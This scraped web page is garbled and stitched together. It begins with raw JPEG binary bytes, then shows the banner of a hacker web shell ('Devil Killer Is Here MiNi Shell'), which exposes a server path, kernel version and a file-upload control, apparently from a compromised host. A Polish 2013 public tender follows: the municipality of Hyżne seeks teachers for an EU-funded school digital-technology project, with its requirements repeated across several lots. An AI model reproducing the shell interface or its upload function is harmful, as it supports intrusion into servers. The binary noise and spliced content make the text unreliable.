JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/402372-N-2013.html

<p class="kh_header"><b>Hyżne: Nabór nauczycieli  w projekcie Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia</b><br>
<b>Numer ogłoszenia: 402372 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół w Hyżnem , Hyżne, 36-024 Hyżne, woj. podkarpackie, tel. 17 22 95 005, faks 17 22 95 001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hyzne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nabór nauczycieli  w projekcie Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia- realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania powyższego warunku wykonawca wykaże, iż każda z osób, przy pomocy której zamierza wykonywać zamówienie- co najmniej jedna do każdej części zamówienia ( w przypadku osób fizycznych, które zamierzają osobiście wykonywać zamówienie dotyczy to tych osób), spełnia wymagania, o których mowa w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z dnia 27 marca 2009 r.) tj.     posiadanie wykształcenia wyższego wraz z kwalifikacjami uprawniającymi do prowadzenia danego typu zajęć, to jest:
a)	Dla zajęć humanistycznych uprawnienia do prowadzenia zajęć z historii lub języka polskiego,
b)	Dla zajęć matematyczno-przyrodniczych uprawnienia do prowadzenia zajęć z przyrody, biologii lub matematyki,
c)	Dla zajęć językowych uprawnienia do prowadzenia zajęć z języka angielskiego.
 Wzór wykazu stanowi załącznik nr 5 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hyzne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno - Administracyjny Szkół w Hyżnem, Hyżne 103, 36-024 Hyżne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 10:50, miejsce: Gminny Zespół Ekonomiczno - Administracyjny Szkół w Hyżnem, Hyżne 103, 36-024 Hyżne   ( sekretariat Urzędu Gminy Hyżne pok. Nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1 Zajęcia dydaktyczno-wyrównawcze - humanistyczne i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2  Zajęcia dydaktyczno-wyrównawcze - matematyczno-przyrodnicze i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia- realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
